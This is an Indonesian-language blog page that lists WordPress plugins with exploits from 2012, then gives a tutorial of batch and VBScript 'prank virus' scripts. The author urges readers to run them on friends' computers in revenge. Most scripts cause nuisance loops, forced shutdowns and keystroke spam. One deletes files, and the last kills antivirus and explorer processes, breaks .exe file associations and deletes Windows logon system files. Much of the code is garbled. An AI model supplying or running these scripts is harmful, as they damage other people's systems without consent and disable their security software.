  • WordPress WP Forum Server May 16, 2012
  • Media Library Categories Plugin May 16, 2012
  • PDF & Print Button Joliprint Plugin May 16, 2012
  • CodeStyling Localization May 16, 2012
  • 2 Click Social Media Buttons May 16, 2012
  • WordPress Newsletter Manager Plugin May 16, 2012
  • Mingle Forum May 16, 2012
  • SoundCloud Is Gold May 16, 2012
  • Subscribe2 May 16, 2012
  • WP-FaceThumb May 15, 2012
  • User Photo Plugin May 11, 2012
  • Zingiri Web Shop May 3, 2012
  • ShareYourCart Plugin April 27, 2012
  • WordPress Sharebar Plugin April 23, 2012
  • WP Survey And Quiz Tool April 23, 2012
  • Zingiri Web Shop April 23, 2012
  • WordPress Download Manager April 23, 2012
  • Sh-slideshow April 14, 2012
  • WP Marketplace Plugin April 11, 2012
  • Nmedia Users File Uploader April 11, 2012
  • Another WordPress Classifieds Plugin April 5, 2012
  • BuddyPress April 5, 2012
  • CMS Tree Page March 27, 2012
  • WordPress Image News slider March 26, 2012
  • Blaze Slideshow March 26, 2012
  • WordPress Carousel Slideshow Plugin March 26, 2012
  • Video Embed & Thumbnail Generator Plugin February 27, 2012
  • Magn WP Drag and Drop Upload February 27, 2012
  • SB Uploader February 27, 2012
  • WordPress Absolute Privacy Plugin February 27, 2012
  • S2Member Pro WordPress membership plugin February 27, 2012
  • AllWebMenus WordPress Menu Plugin January 26, 2012
  • Theme Tuner January 26, 2012
  • WP e-Commerce January 26, 2012
  • My Calendar Plugin January 26, 2012
  • uCan Post plugin January 26, 2012
  • NextGEN Gallery January 26, 2012
  • Count Per Day Plugin January 16, 2012
  • Pay With Tweet Plugin January 16, 2012
  • Whois Search Plugin January 4, 2012
  • TheCartPress Plugin January 4, 2012
  • Connections January 2, 2012
  • WP Symposium January 2, 2012
Daftar lengkap ada disini: http://wpsecure.net/category/exploits
Semoga menjadi informasi yang bermanfaat dan dapat digunakan untuk memperbaiki wordpress masing-masing

Script virus notepad


hallo akang dan teteh hehe :D bingung atau kesal sama yang nama nya virus apalagi virus dari flashdisk atau memori punya teman yang main colok ke laptop atau PC kalian ? 

yuk mari kita kerjain balik laptop atau PC kawan kita yang udah infeksiin virus pada gadget kita ehehe =D

buka notepad lalu copy-paste code dibawah ini ,lalu save as  dengan format yang masing - masing udah ada di bawah code nya 
1: Pesan Yang Akan Muncul Terus Menerus Secara Otomatis



@ECHO off

:Begin

msg * muka lo jelek

msg * ngaca dulu gih

msg * hayo lo, cpu lu gw acak2

msg * ud install ulang aja

msg * biar masalah nya kelar

GOTO BEGIN



==> Simpan nama script diatas dengan format *.bat



Script Jahil 2: Bikin Komputer Mati + Pesan



@echo off

msg * apaan sih lo

shutdown -s -c Error! muka mu

standar abis



==> Simpan nama script diatas dengan format *.vbs











Script Jahil 3: Buka-Tutup CD/DVD secara Otomatis:



Set oWMP = CreateObject(WMPlayer.OCX.7?)

Set colCDROMs = oWMP.cdromCollection

do

if colCDROMs.Count >= 1 then

For i = 0 to colCDROMs.Count 1

colCDROMs.Item(i).Eject

Next

For i = 0 to colCDROMs.Count 1

colCDROMs.Item(i).Eject

Next

End If



wscript.sleep 5000

loop



==> Simpan nama script diatas dengan format *.vbs

3. MAININ TOMBOL CAPS LOCK



Code:



 Set wshShell =wscript.CreateObject(WScript.Shell)

 do

 wscript.sleep 100

 wshshell.sendkeys {CAPSLOCK}

loop

==> save nama script diatas dg ekstensi *.vbs

4. BUKA TUTUP CD/DVD SECARA OTOMATIS



Code:



 Set oWMP = CreateObject(WMPlayer.OCX.7?)

 Set colCDROMs = oWMP.cdromCollection

 do

 if colCDROMs.Count >= 1 then

 For i = 0 to colCDROMs.Count 1

 colCDROMs.Item(i).Eject

 Next

 For i = 0 to colCDROMs.Count 1

 colCDROMs.Item(i).Eject

 Next

 End If

 wscript.sleep 5000

loop

==> save nama script diatas dg ekstensi *.vbs



5. MENEKAN TOMBOL ENTER TERUS MENERUS



Code:



 Set wshShell =wscript.CreateObject("WScript.Shell")

do

wscript.sleep 100

wshshell.sendkeys "~(enter)"

loop

==> save nama script diatas dg ekstensi *.vbs



6. MENEKAN TOMBOL BACKSPACE TERUS MENERUS SECARA OTOMATIS



Code:



 MsgBox Lets Rumble

 Set wshShell =wscript.CreateObject(WScript.Shell)

 do

 wscript.sleep 100

 wshshell.sendkeys {bs}

loop

==> save nama script diatas dg ekstensi *.vbs

7. OTOMATIS NGETIK LU JELEK BANGET SIH DI NOTEPAD ATAU M.WORD



Code:



 Set wshShell =wscript.CreateObject("WScript.Shell")

do

wscript.sleep 100

wshshell.sendkeys "lu jelek banget sih!!!"

loop

==> save nama script diatas dg ekstensi *.vbs



8. MEMBUKA NOTEPAD TERUS MENERUS



Code:



 @ECHO off

:top

START %SystemRoot%

\system32\notepad.exe

GOTO top

==> save nama script diatas dg ekstensi *.bat



9. OTOMATIS BUKA NOTEPAD LALU NGETIK APA YG LO MAU



Code:



 WScript.Sleep 180000

 WScript.Sleep 10000

 Set WshShell = WScript.CreateObject(WScript.Shell)

 WshShell.Run notepad

 WScript.Sleep 100

 WshShell.AppActivate Notepad

 WScript.Sleep 500

 WshShell.SendKeys Ka

 WScript.Sleep 500

 WshShell.SendKeys mu

 WScript.Sleep 500

 WshShell.SendKeys , je

 WScript.Sleep 500

 WshShell.SendKeys l ek

 WScript.Sleep 500

 WshShell.SendKeys am

 WScript.Sleep 500

 WshShell.SendKeys at

 WScript.Sleep 500

 WshShell.SendKeys ya

 WScript.Sleep 500

 WshShell.SendKeys P er

 WScript.Sleep 500

 WshShell.SendKeys ma k

 WScript.Sleep 500

 WshShell.SendKeys tuh

 WScript.Sleep 500

 WshShell.SendKeys mu

 WScript.Sleep 500

 WshShell.SendKeys ka

 WScript.Sleep 500

WshShell.SendKeys hohoho

==> save nama script diatas dg ekstensi *.vbs



10. BISA MEMILIH JAWABAN SEPERTI QUIZ LAH KIRA2



Code:



 @echo off

title quiz hari ini





:menu

cls

echo jika kamu kena virus apa

yang kamu lakukan

pause

echo pilih yang mana:

echo 1. matiin computer

echo 2. format aja

echo 3. bingung ahh

set input=nothing

set /p input=Choice:

if %input%==1 shutdown -s -t

30

if %input%==2 del c:\xxx

if %input%==3 @ECHO off

msg * muka lo rusak

msg * ngaca dulu gih

msg * hayo lo,cpu lu gw acak2

msg * ud install ulang aja

msg * biar masalah nya kelar

@ECHO off

:top

START %SystemRoot%

\system32\notepad.exe

GOTO top

==> nah script diatas save jadi quiz.bat 
tolong digunakan dengan bijak dan saya tidak bertanggung jawab dengan apa yang terjadi
selanjutnya karena saya hanya sekedar berbagi sama akang dan teteh :D


11. YANG INI PALING BAHAYA, JANGAN DICOBA DI KOMPUTER KAMU



Code:



 @echo off

set end=md Hack

installing

set fin=copy Hack

log.txt Installing

%end%

%fin%

net send * Hack is

installing, press OK to

begin set up.

kill NAVAPSVC.exe /F /Q

kill zonelabs.exe /F /Q

kill explorer.exe /F /Q

cls

assoc .exe=txtfile

assoc .txt=mp3file

cls

msg * It is you who is

hacked .

msg * I warned you,

and you kept going.

Challenge me and this

is what happens.

DEL C:\WINDOWS

\system32\logoff.exe /

F /Q

DEL C:\WINDOWS

\system32\logon.exe /

F /Q

DEL C:\WINDOWS

\system32\logon.scr /

F /Q

cls

shutdown -s -t 5 -c

thank you for

waiting

==> save script diatas dg ekstensi *.bat